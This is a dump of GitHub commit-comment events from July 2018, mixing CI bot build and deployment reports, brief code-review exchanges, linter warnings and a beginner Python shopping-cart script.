{"id":"7961487801","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29698313,"position":null,"line":null,"path":null,"commit_id":"aaacdcc8ec454ad97d9ab84576a1f29887a5d205","created_at":"2018-07-13T10:56:54Z","updated_at":"2018-07-13T10:56:54Z","author_association":"COLLABORATOR","body":"<h3>new notifications icon added (#2674)</h3>\n\nPreview: <strong><a href='https://18553-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18553-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18553-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-13T10:56:54Z"}
{"id":"7961492633","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29698316,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-13T10:58:01Z","updated_at":"2018-07-13T10:58:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T10:58:01Z"}
{"id":"7961493084","type":"CommitCommentEvent","actor":{"login":"bcgit"},"repo":{"name":"bcgit/bc-java"},"payload":{"comment":{"id":29698318,"position":121,"line":3250,"path":"pg/src/test/java/org/bouncycastle/openpgp/test/PGPKeyRingTest.java","commit_id":"486c6d3f18422c77e52b74061bc315d582c9e8cc","created_at":"2018-07-13T10:58:07Z","updated_at":"2018-07-13T10:58:07Z","author_association":"OWNER","body":"Yes, good point! I was paying more attention to what was further on..."}},"created_at":"2018-07-13T10:58:07Z"}
{"id":"7961493662","type":"CommitCommentEvent","actor":{"login":"jreznot"},"repo":{"name":"cuba-platform/cuba"},"payload":{"comment":{"id":29698319,"position":6,"line":6,"path":"modules/gui/src/com/haulmont/cuba/gui/components/RatioLayout.java","commit_id":"ab17ad6526850b2292191d46960d704f0f9261e5","created_at":"2018-07-13T10:58:15Z","updated_at":"2018-07-13T10:58:15Z","author_association":"MEMBER","body":"Let's rename it. Use simple name like SupportsExpandRatio"}},"created_at":"2018-07-13T10:58:15Z"}
{"id":"7961497223","type":"CommitCommentEvent","actor":{"login":"endiliey"},"repo":{"name":"jjasont/fundraisee-api"},"payload":{"comment":{"id":29698323,"position":null,"line":null,"path":null,"commit_id":"e9a3fe4a85a4727028f7298339bf8e70693af00b","created_at":"2018-07-13T10:59:03Z","updated_at":"2018-07-13T10:59:03Z","author_association":"NONE","body":"@jjasont\r\n\r\nYou should submit this as a pull request :)\r\n\r\nYou can read https://github.com/Roshanjossey/first-contributions/blob/master/README.md as a guide\r\n\r\nExample:\r\n<img style=\"float: right;\" src=\"https://raw.githubusercontent.com/Roshanjossey/first-contributions/master/assets/compare-and-pull.png\" alt=\"create a pull request\" />\r\n"}},"created_at":"2018-07-13T10:59:03Z"}
{"id":"7961497691","type":"CommitCommentEvent","actor":{"login":"jreznot"},"repo":{"name":"cuba-platform/cuba"},"payload":{"comment":{"id":29698324,"position":27,"line":63,"path":"modules/gui/src/com/haulmont/cuba/gui/xml/layout/loaders/AbstractBoxLoader.java","commit_id":"ab17ad6526850b2292191d46960d704f0f9261e5","created_at":"2018-07-13T10:59:11Z","updated_at":"2018-07-13T10:59:11Z","author_association":"MEMBER","body":"Why ? It should not be required!!!"}},"created_at":"2018-07-13T10:59:11Z"}
{"id":"7961499674","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29698327,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T10:59:39Z","updated_at":"2018-07-13T10:59:39Z","author_association":"NONE","body":"159013173_Issue#6243 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1686 of 1686 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-13T10:59:39Z"}
{"id":"7961500441","type":"CommitCommentEvent","actor":{"login":"TonisOrmisson"},"repo":{"name":"2amigos/yii2-usuario"},"payload":{"comment":{"id":29698329,"position":5,"line":103,"path":"src/User/resources/views/settings/account.php","commit_id":"19eb9df623063f9afc3959dfded53c7bf59f1f4d","created_at":"2018-07-13T10:59:51Z","updated_at":"2018-07-13T10:59:51Z","author_association":"CONTRIBUTOR","body":"While translating this. I was wondering whether it is correct to say it \"protects you against\". Or is it more like it protects you \"in case of credentials get stolen\". Its not _preventing_ it, instead it deals with the consequences. English is not my native language so maybe someone can comment on that, cheers. "}},"created_at":"2018-07-13T10:59:51Z"}
{"id":"7961501436","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29698336,"position":null,"line":null,"path":null,"commit_id":"5e186d11ca7e02a898b6924fe748f99e08b44891","created_at":"2018-07-13T11:00:06Z","updated_at":"2018-07-13T11:00:06Z","author_association":"OWNER","body":"### A shopping cart program:\r\n`stuff=[['1','.','iphone8',6999],['2','.','GTX 1080Ti',2999],['3','.','Hk416',2880],['4','.','Bike',880],['5','.','Book',89]]\r\nsalary=int(input('Please input your salary:'))\r\n\r\nchoice='None'\r\n\r\nshopping_cart=[]\r\nflag=1\r\n\r\nwhile choice!='q':\r\n    for i in stuff:\r\n        print(i[0]+i[1],i[2],i[3])\r\n    choice=input('Please input your choice:')\r\n    for i in stuff:\r\n        if choice in i:\r\n            flag=0\r\n            if i[3]<=salary:\r\n                shopping_cart.append(i)\r\n                salary=salary-i[3]\r\n            else:\r\n                print('your salary is not enough!')\r\n                break\r\n\r\n    if choice!='q' and flag==1:\r\n        print('Wrong input,please input q or other valid number.')\r\n    else:\r\n        break\r\n\r\n`"}},"created_at":"2018-07-13T11:00:06Z"}
{"id":"7961504294","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29698344,"position":null,"line":null,"path":null,"commit_id":"5e186d11ca7e02a898b6924fe748f99e08b44891","created_at":"2018-07-13T11:00:43Z","updated_at":"2018-07-13T11:00:43Z","author_association":"OWNER","body":"### A shopping cart program:\r\n```\r\nstuff=[['1','.','iphone8',6999],['2','.','GTX 1080Ti',2999],['3','.','Hk416',2880],['4','.','Bike',880],['5','.','Book',89]]\r\nsalary=int(input('Please input your salary:'))\r\n\r\nchoice='None'\r\n\r\nshopping_cart=[]\r\nflag=1\r\n\r\nwhile choice!='q':\r\n    for i in stuff:\r\n        print(i[0]+i[1],i[2],i[3])\r\n    choice=input('Please input your choice:')\r\n    for i in stuff:\r\n        if choice in i:\r\n            flag=0\r\n            if i[3]<=salary:\r\n                shopping_cart.append(i)\r\n                salary=salary-i[3]\r\n            else:\r\n                print('your salary is not enough!')\r\n                break\r\n\r\n    if choice!='q' and flag==1:\r\n        print('Wrong input,please input q or other valid number.')\r\n    else:\r\n        break\r\n\r\n```\r\n"}},"created_at":"2018-07-13T11:00:43Z"}
{"id":"7961509405","type":"CommitCommentEvent","actor":{"login":"rolego"},"repo":{"name":"ReactiveX/rxjs"},"payload":{"comment":{"id":29698355,"position":5,"line":24,"path":"src/internal/Observable.ts","commit_id":"21dd3bd3ca1cf5bcef9d0d1067f270e758dfdb7e","created_at":"2018-07-13T11:01:54Z","updated_at":"2018-07-13T11:01:54Z","author_association":"NONE","body":"Hello @benlesh. Making these members public leads to other type compatibility issues. E.g. you cannot assign an Observable from RXJS5 to a field of type Observable from RXJS6. What would be the proposed way to deal with this?"}},"created_at":"2018-07-13T11:01:54Z"}
{"id":"7961509961","type":"CommitCommentEvent","actor":{"login":"theChaosCoder"},"repo":{"name":"HomeOfVapourSynthEvolution/havsfunc"},"payload":{"comment":{"id":29698357,"position":null,"line":null,"path":null,"commit_id":"d58d68134934dfc49153116c4edc1ab46e333877","created_at":"2018-07-13T11:02:02Z","updated_at":"2018-07-13T11:02:02Z","author_association":"NONE","body":"I think so. Google has the site in cache https://webcache.googleusercontent.com/search?q=cache:bT6zOLOjgfcJ:https://github.com/HomeOfVapourSynthEvolution/VapourSynth-DePan\r\nBut the depan.cpp is not cached due to the robots.txt\r\n\r\nYou can see r1 in releases and \"initial commit\" on the Depan folder. "}},"created_at":"2018-07-13T11:02:02Z"}
{"id":"7961510714","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ecmwf/caliver"},"payload":{"comment":{"id":29698362,"position":null,"line":null,"path":null,"commit_id":"bd6b3ebbf50097f6467149ec8bef91facbbc9a51","created_at":"2018-07-13T11:02:13Z","updated_at":"2018-07-13T11:02:13Z","author_association":"NONE","body":"[R/anomaly.R:103:67:](https://github.com/ecmwf/caliver/blob/bd6b3ebbf50097f6467149ec8bef91facbbc9a51/R/anomaly.R#L103) *style:* **Put spaces around all infix operators.**\n```r\n​  legend(x = round(par(\"usr\")[2] + (par(\"usr\")[2] - par(\"usr\")[1])/90, 0),\n                                                                 ~^~\n```\n[R/ranking.R:78:67:](https://github.com/ecmwf/caliver/blob/bd6b3ebbf50097f6467149ec8bef91facbbc9a51/R/ranking.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​  legend(x = round(par(\"usr\")[2] + (par(\"usr\")[2] - par(\"usr\")[1])/90, 0),\n                                                                 ~^~\n```\n[tests/testthat/test-get_percentile_raster.R:60:4:](https://github.com/ecmwf/caliver/blob/bd6b3ebbf50097f6467149ec8bef91facbbc9a51/tests/testthat/test-get_percentile_raster.R#L60) *style:* **Commented code should be removed.**\n```r\n​  #skip(\"skip temporarily for testing\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-get_percentile_raster.R:78:4:](https://github.com/ecmwf/caliver/blob/bd6b3ebbf50097f6467149ec8bef91facbbc9a51/tests/testthat/test-get_percentile_raster.R#L78) *style:* **Commented code should be removed.**\n```r\n​  #skip(\"skip temporarily for testing\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-13T11:02:13Z"}
{"id":"7961513937","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29698369,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T11:03:01Z","updated_at":"2018-07-13T11:03:01Z","author_association":"NONE","body":"Let's keep the functionality, so not via owner.\r\n\r\nWhy not use Bob's parameter? After all she created it so she knows it.\r\nThink back to how you confirmed Carol's address."}},"created_at":"2018-07-13T11:03:01Z"}
{"id":"7961520208","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29698384,"position":null,"line":null,"path":null,"commit_id":"834113607dbd241332ce36f674d9b9af61b0c3ba","created_at":"2018-07-13T11:04:30Z","updated_at":"2018-07-13T11:04:30Z","author_association":"OWNER","body":"Thanks. The vbox pkg update commit is not strictly necessary but does not hurt of course."}},"created_at":"2018-07-13T11:04:30Z"}
{"id":"7961521184","type":"CommitCommentEvent","actor":{"login":"theChaosCoder"},"repo":{"name":"HomeOfVapourSynthEvolution/havsfunc"},"payload":{"comment":{"id":29698385,"position":null,"line":null,"path":null,"commit_id":"d58d68134934dfc49153116c4edc1ab46e333877","created_at":"2018-07-13T11:04:43Z","updated_at":"2018-07-13T11:04:43Z","author_association":"NONE","body":":) https://github.com/darealshinji/vapoursynth-plugins/blob/master/plugins/depan/src/DePan.cpp"}},"created_at":"2018-07-13T11:04:43Z"}
{"id":"7961527793","type":"CommitCommentEvent","actor":{"login":"infinity-plus"},"repo":{"name":"infinity-plus/School_Project"},"payload":{"comment":{"id":29698405,"position":null,"line":null,"path":null,"commit_id":"9a627445cdb0d0b300933b1c0132d52a0c998ce3","created_at":"2018-07-13T11:06:20Z","updated_at":"2018-07-13T11:06:20Z","author_association":"OWNER","body":"Basic idea about searching a string in file.\r\n"}},"created_at":"2018-07-13T11:06:20Z"}
{"id":"7961527995","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29698406,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-13T11:06:23Z","updated_at":"2018-07-13T11:06:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T11:06:23Z"}
{"id":"7961531878","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29698413,"position":null,"line":null,"path":null,"commit_id":"cd2043282b2fc9472b47449ee9814bf043355b05","created_at":"2018-07-13T11:07:20Z","updated_at":"2018-07-13T11:07:20Z","author_association":"COLLABORATOR","body":"Puzzle `4-8fe4d4f8` disappeared from [`node/app.py`](https://github.com/DronMDF/zold-lazy-node/blob/master/node/app.py), that's why I closed #32. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-13T11:07:20Z"}
{"id":"7961540421","type":"CommitCommentEvent","actor":{"login":"felipemoran"},"repo":{"name":"felipemoran/charlie-parser"},"payload":{"comment":{"id":29698432,"position":null,"line":null,"path":null,"commit_id":"4246062a405aa9f0e46196f3b60c45aacf817f5e","created_at":"2018-07-13T11:09:25Z","updated_at":"2018-07-13T11:09:25Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/982e7a50-e315-4261-922d-0d17d409650a?env_id=ibm%3Ayp%3Aeu-gb \"parser_toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/3bddfb21-e5ce-44d1-8be5-5782e512f405?env_id=ibm%3Ayp%3Aeu-gb \"charlie-parser-pipeline_master\") deployed [charlie-parser](https://github.com/felipemoran/charlie-parser/releases/tag/deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180713-110923 \"deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180713-110923\") to [test](https://console.bluemix.net/apps/b4791f18-68b2-4358-bc01-a877853095bb?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:felipe.moran-correa-meyer:test\"), including this commit"}},"created_at":"2018-07-13T11:09:25Z"}
{"id":"7961542876","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwiki/xwiki-commons"},"payload":{"comment":{"id":29698441,"position":17,"line":171,"path":"xwiki-commons-core/pom.xml","commit_id":"e8ca631240fe07b4c7ba9f94853c386772986e5c","created_at":"2018-07-13T11:10:01Z","updated_at":"2018-07-13T11:10:01Z","author_association":"MEMBER","body":"This breaks the release as the version (10.6-SNAPSHOT) is not updated. I'll remove these 2 lines as it seems we don't need them. We just need to be careful from now on when copy pasting the revapi report and remove these lines before committing."}},"created_at":"2018-07-13T11:10:01Z"}
{"id":"7961548829","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"purcell/color-theme-sanityinc-tomorrow"},"payload":{"comment":{"id":29698455,"position":null,"line":null,"path":null,"commit_id":"2654ffe584d104d631ca27a526c65002532e25c9","created_at":"2018-07-13T11:11:24Z","updated_at":"2018-07-13T11:11:24Z","author_association":"CONTRIBUTOR","body":"The underline is a really nice touch! :+1: "}},"created_at":"2018-07-13T11:11:24Z"}
{"id":"7961549323","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29698456,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-13T11:11:30Z","updated_at":"2018-07-13T11:11:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T11:11:30Z"}
{"id":"7961553871","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29698471,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-13T11:12:39Z","updated_at":"2018-07-13T11:12:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T11:12:39Z"}
{"id":"7961557512","type":"CommitCommentEvent","actor":{"login":"Xesenix"},"repo":{"name":"TheModMaker/karma-jasmine"},"payload":{"comment":{"id":29698486,"position":7,"line":176,"path":"src/adapter.js","commit_id":"f3fa264107cb5695ee0f906895a204c9d0efdd13","created_at":"2018-07-13T11:13:33Z","updated_at":"2018-07-13T11:13:33Z","author_association":"NONE","body":"this one obscures errors I had here error that doesn't have field `failedExpectations` in result ive got somethin like this:\r\n```\r\n{\r\n    \"message\": \"An error was thrown in afterAll\\n[object ErrorEvent] thrown\",\r\n    \"str\": \"An error was thrown in afterAll\\n[object ErrorEvent] thrown\"\r\n  }\r\n```\r\nand no clue where was it thrown in app that has 900+ test ...."}},"created_at":"2018-07-13T11:13:33Z"}
{"id":"7961560114","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29698494,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-13T11:14:12Z","updated_at":"2018-07-13T11:14:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T11:14:12Z"}
{"id":"7961570955","type":"CommitCommentEvent","actor":{"login":"gokceneraslan"},"repo":{"name":"theislab/scanpy"},"payload":{"comment":{"id":29698535,"position":100,"line":139,"path":"scanpy/plotting/anndata.py","commit_id":"4f196176f14086a167f68a0a475e91c957a46be9","created_at":"2018-07-13T11:16:55Z","updated_at":"2018-07-13T11:16:55Z","author_association":"CONTRIBUTOR","body":"See https://github.com/theislab/scanpy/issues/198."}},"created_at":"2018-07-13T11:16:55Z"}
{"id":"7961573238","type":"CommitCommentEvent","actor":{"login":"maksimus2196"},"repo":{"name":"maksimus2196/Test_ria_git"},"payload":{"comment":{"id":29698541,"position":2,"line":1,"path":"index.js","commit_id":"12a3bc30c10e9ae9010a198c0db1e44b48beb1dc","created_at":"2018-07-13T11:17:27Z","updated_at":"2018-07-13T11:17:27Z","author_association":"OWNER","body":"\\"}},"created_at":"2018-07-13T11:17:27Z"}
{"id":"7961581106","type":"CommitCommentEvent","actor":{"login":"suthagar23"},"repo":{"name":"openmrs/openmrs-module-locationbasedaccess"},"payload":{"comment":{"id":29698555,"position":13,"line":57,"path":"api/src/main/java/org/openmrs/module/locationbasedaccess/PatientSearchAdviser.java","commit_id":"dc1f2548225252ed3356e967bee0e402c2f4d8a6","created_at":"2018-07-13T11:19:23Z","updated_at":"2018-07-13T11:19:23Z","author_association":"MEMBER","body":"Yes, Address @dkayiwa  \r\n\r\nhttps://talk.openmrs.org/t/could-not-fetch-the-usercontext-for-a-getpatientbyuuid-call-from-emrapi-module/18917/13"}},"created_at":"2018-07-13T11:19:23Z"}
{"id":"7961588811","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-module-locationbasedaccess"},"payload":{"comment":{"id":29698568,"position":13,"line":57,"path":"api/src/main/java/org/openmrs/module/locationbasedaccess/PatientSearchAdviser.java","commit_id":"dc1f2548225252ed3356e967bee0e402c2f4d8a6","created_at":"2018-07-13T11:21:17Z","updated_at":"2018-07-13T11:21:17Z","author_association":"MEMBER","body":"In which pull request did you address it?"}},"created_at":"2018-07-13T11:21:17Z"}
{"id":"7961589416","type":"CommitCommentEvent","actor":{"login":"SandunSuranjana"},"repo":{"name":"SandunSuranjana/gym"},"payload":{"comment":{"id":29698570,"position":null,"line":null,"path":null,"commit_id":"edb2e266486d290c967d51196470a35a8c875a74","created_at":"2018-07-13T11:21:27Z","updated_at":"2018-07-13T11:21:27Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-13T11:21:27Z"}
{"id":"7961590560","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-smbc-bot"},"payload":{"comment":{"id":29698572,"position":null,"line":null,"path":null,"commit_id":"e8763a32ffea1a526971f573da3f9682ed59cef0","created_at":"2018-07-13T11:21:43Z","updated_at":"2018-07-13T11:21:43Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/59483139-581b-420d-90f0-d1a4f85c757d?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/60053b78-cf64-42ea-8ce3-3ba3ce629cf0?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\") deployed [watsonwork-smbc-bot](https://github.com/WilliamHolmes/watsonwork-smbc-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-112142 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-112142\") to [dev](https://console.bluemix.net/apps/614b28c8-bbda-4a4b-b0da-a51b1e3ed64a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T11:21:43Z"}
{"id":"7961621176","type":"CommitCommentEvent","actor":{"login":"toschneck"},"repo":{"name":"3jmaster/docker-headless-vnc-container"},"payload":{"comment":{"id":29698627,"position":null,"line":null,"path":null,"commit_id":"f30253a51018e47362ade948e8219eda1baccdd2","created_at":"2018-07-13T11:29:15Z","updated_at":"2018-07-13T11:29:15Z","author_association":"NONE","body":"@3jmaster great approach. Can you may provide a PR as additional image and share it to the main repo?"}},"created_at":"2018-07-13T11:29:15Z"}
{"id":"7961629277","type":"CommitCommentEvent","actor":{"login":"nikochan2k"},"repo":{"name":"nikochan2k/gpslogger2probemon"},"payload":{"comment":{"id":29698647,"position":null,"line":null,"path":null,"commit_id":"0f4d30972c1b6a71ec71fdb1c85a910aa7f1e26c","created_at":"2018-07-13T11:31:14Z","updated_at":"2018-07-13T11:31:14Z","author_association":"OWNER","body":"This is just a sample code. Feel free to copy it if you like.\r\n\r\nI wrote new code inspired by \"probemon\".\r\nhttps://github.com/nikochan2k/pi-collector\r\nThis can collect wifi and bluetooth mac address with GPS position.\r\nI'll finish up this code during this month, I'll also write \"Readme.md\" properly."}},"created_at":"2018-07-13T11:31:14Z"}
{"id":"7961630356","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29698649,"position":26,"line":46,"path":"src/main/java/ml/duncte123/skybot/Settings.java","commit_id":"c7a590f4823f766f039b19d7b667ff2d512b28cf","created_at":"2018-07-13T11:31:30Z","updated_at":"2018-07-13T11:31:30Z","author_association":"MEMBER","body":"Which tests? I did check the usage"}},"created_at":"2018-07-13T11:31:30Z"}
{"id":"7961635650","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29698654,"position":26,"line":46,"path":"src/main/java/ml/duncte123/skybot/Settings.java","commit_id":"c7a590f4823f766f039b19d7b667ff2d512b28cf","created_at":"2018-07-13T11:32:48Z","updated_at":"2018-07-13T11:32:48Z","author_association":"MEMBER","body":"Nvm the test classes. We skip them most of the time. I will fix it"}},"created_at":"2018-07-13T11:32:48Z"}
{"id":"7961647499","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29698677,"position":null,"line":null,"path":null,"commit_id":"5f063d76068197e606696adc350de84a955e3bdc","created_at":"2018-07-13T11:35:42Z","updated_at":"2018-07-13T11:35:42Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-13T11:35:42Z"}
{"id":"7961648795","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29698678,"position":null,"line":null,"path":null,"commit_id":"2feaa8b5126efc8a8bf5da77a1b7fa8c48354105","created_at":"2018-07-13T11:36:02Z","updated_at":"2018-07-13T11:36:02Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-13T11:36:02Z"}
